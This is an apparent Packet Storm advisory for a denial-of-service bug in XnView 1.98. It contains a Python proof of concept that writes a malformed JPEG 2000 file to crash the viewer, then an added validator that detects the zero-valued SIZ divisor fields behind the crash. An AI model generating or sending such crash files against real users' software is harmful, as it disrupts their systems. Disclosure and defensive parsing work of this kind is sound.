XnView 1.98 Denial Of Service Proof Of Concept

20 Jun 2011 · Reported by BraniX · Type: packetstorm · Source: packetstormsecurity.com

XnView 1.98 denial of service caused by an integer division by zero in module Xjp2.dll, triggered by a specific JP2000 file.

Code
```python
# done by BraniX
# found: 2011.06.19
# published: 2011.06.20
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional

# App: XnView 1.98 (latest version)
# App Url: http://www.xnview.com
# xnview.exe MD5: ebe200d81a095d296e94e887dc40e607
# Xjp2.dll MD5: 0c831c090f5a723d44bb641b175ca0e6

# DoS is caused by integer division by zero in module Xjp2.dll

# It can be triggered from:
# Local: C:\XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# Remote: \\MySecretServer\XnView 1.98 JP2000 (Compression 50%) DoS.jp2

# 1000D1C4 8A44BA 03 MOV AL,BYTE PTR DS:[EDX+EDI*4+3]
# 1000D1C8 8941 E4 MOV DWORD PTR DS:[ECX-1C],EAX
# 1000D1CB 8B56 0C MOV EDX,DWORD PTR DS:[ESI+C]
# 1000D1CE 8D4413 FF LEA EAX,DWORD PTR DS:[EBX+EDX-1]
# 1000D1D2 33D2 XOR EDX,EDX
# 1000D1D4 F7F3 DIV EBX ; div by zero
# 1000D1D6 33D2 XOR EDX,EDX
# 1000D1D8 8BE8 MOV EBP,EAX
# 1000D1DA 8B46 04 MOV EAX,DWORD PTR DS:[ESI+4]
# 1000D1DD 8D4403 FF LEA EAX,DWORD PTR DS:[EBX+EAX-1]
# 1000D1E1 F7F3 DIV EBX
# 1000D1E3 8B59 E4 MOV EBX,DWORD PTR DS:[ECX-1C]

filepath = "C:\\XnView 1.98 JP2000 (Compression 50%) DoS.jp2"
f = open(filepath, "wb")
# Bytes literal so the write to a binary-mode file works on Python 2 and 3
poc = b'\x00\x00\x00\x0C\x6A\x50\x20\x20\x0D\x0A\x87\x0A\x00\x00\x00\x14\x66\x74\x79\x70\x6A\x70\x32\x20\x00\x00\x00\x00\x6A\x70\x32\x20\x00\x00\x00\x2D\x6A\x70\x32\x68\x00\x00\x00\x16\x69\x68\x64\x72\x00\x00\x00\x0D\x00\x00\x00\x0B\x00\x03\x07\x07\x00\x00\x00\x00\x00\x0F\x63\x6F\x6C\x72\x01\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x6A\x70\x32\x63\xFF\x4F\xFF\x51\x00\x2F\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x07\x00\x00\x07\x01\x01\x07\x01\x01\xFF\x5C\x00\x17\x42\x60\xC8\x42\x5D\x42\x5D\x42\x6D\x3A\xDB\x3A\xDB\x3B\x35\x32\xB8\x32\xB8\x32\x6B\xFF\x5D\x00\x18\x01\x42\x60\x6D\x41\xF2\x41\xF2\x42\x01\x3A\x6B\x3A\x6B\x3A\xC1\x32\x49\x32\x49\x31\xFF\xFF\x5D\x00\x18\x02\x42\x61\xAA\x43\x69\x43\x69\x43\x7A\x3B\xF3\x3B\xF3\x3C\x56\x33\xCC\x33\xCC\x33\x78\xFF\x52\x00\x0C\x00\x00\x00\x01\x01\x03\x04\x04\x00\x00\xFF\x64\x00\x0F\x00\x01\x4C\x57\x46\x5F\x4A\x50\x32\x5F\x32\x30\x37\xFF\x90\x00\x0A\x00\x00\x00\x00\x00\xA7\x00\x01\xFF\x93\xC7\xEC\x0C\x08\x8A\xC1\xC5\xD6\x54\xC0\x7D\x40\xA0\x0B\xBF\x3B\x6F\xDF\xC1\xF8\x02\x80\x03\x97\x3D\x32\x8B\xC0\xF8\x42\x87\xCE\x12\x07\xC2\x10\x01\x7F\x0C\x31\x03\x6B\x0B\xE3\xA0\x10\x80\x01\xC0\x74\x18\x1F\x08\x60\x04\x0C\x41\x6F\xC3\xE4\x13\x07\xC2\x34\x1F\x08\x80\x1C\xDD\xFD\x75\xB0\xA9\x74\x39\x3F\x0D\x31\x97\xD9\xD9\x7F\x0C\xAC\xCD\x9F\xC0\xE8\x60\x1F\x92\xE7\xC0\xE8\xB0\x3A\x1C\x04\x40\x1F\x1E\xA0\x20\x67\x12\x9A\x3F\x0C\xA7\xC3\xE1\x2A\x0E\x93\x07\x45\x61\x1C\x5E\xC3\xDD\xAC\x1B\xF5\x5B\xB9\x03\x8A\xAD\xF5\x07\x1F\x86\x1D\x5F\x19\xD8\x05\x13\xA3\xC0\x84\x5F\xC0\x8A\x04\x80\x01\x7F\x03\x9C\x46\xBF\xFF\xD9'
f.write(poc)
f.close()

print("Done, 1 file generated on 'C:\\' ...")
print("Open this file in XnView 1.98 and enjoy ;)")
```
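The `LEA EAX,[EBX+EDX-1]` / `DIV EBX` pair in the listing is a rounded-up division that faults when the divisor is zero. As an added example (not part of the original advisory or XnView's code), here is a pre-parse check that rejects a JPEG 2000 SIZ segment whose divisor fields are zero. It assumes the standard SIZ layout; `check_siz`, `ceil_div` and `make_siz` are hypothetical names, the sample bytes are constructed to mirror the SIZ fields in the PoC string, and the page does not state which field reaches the faulting `DIV`.

```python
import struct

SOC_SIZ = b"\xff\x4f\xff\x51"  # SOC marker immediately followed by the SIZ marker
SIZ_FMT = ">HHIIIIIIIIH"       # Lsiz Rsiz Xsiz Ysiz XOsiz YOsiz XTsiz YTsiz XTOsiz YTOsiz Csiz

def ceil_div(a, b):
    """Checked form of LEA [b+a-1] / DIV b: refuse a zero divisor."""
    if b == 0:
        raise ValueError("zero divisor")
    return (a + b - 1) // b

def check_siz(data):
    """Return problems in the SIZ fields that a decoder uses as divisors."""
    pos = data.find(SOC_SIZ)
    if pos < 0:
        return ["no SOC+SIZ marker"]
    seg = data[pos + 4:]                  # starts at Lsiz
    fixed = struct.calcsize(SIZ_FMT)      # 38 bytes before the component table
    if len(seg) < fixed:
        return ["SIZ truncated"]
    lsiz, _, _, _, _, _, xt, yt, _, _, csiz = struct.unpack(SIZ_FMT, seg[:fixed])
    if lsiz != fixed + 3 * csiz or len(seg) < lsiz:
        return ["SIZ length inconsistent with Csiz"]
    problems = []
    if xt == 0 or yt == 0:
        problems.append("tile size is zero")
    for i in range(csiz):
        _, xr, yr = seg[fixed + 3 * i:fixed + 3 * i + 3]   # Ssiz, XRsiz, YRsiz
        if xr == 0:
            problems.append("component %d: XRsiz=0" % i)
        if yr == 0:
            problems.append("component %d: YRsiz=0" % i)
    return problems

def make_siz(comps, xt=11, yt=13):
    """Constructed sample: an 11x13 SIZ segment with the given component triples."""
    hdr = struct.pack(SIZ_FMT, 38 + 3 * len(comps), 0, 11, 13, 0, 0, xt, yt, 0, 0, len(comps))
    return SOC_SIZ + hdr + b"".join(bytes(c) for c in comps)

if __name__ == "__main__":
    # Constructed input mirroring the PoC's SIZ fields: component 0 has XRsiz=YRsiz=0.
    print(check_siz(make_siz([(7, 0, 0), (7, 1, 1), (7, 1, 1)])))
    print(check_siz(make_siz([(7, 1, 1)] * 3)))
    print(ceil_div(11, 1), ceil_div(13, 2))
```

Running the check before handing a file to a decoder lets a gateway or batch job quarantine inputs like this one instead of crashing the viewer.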
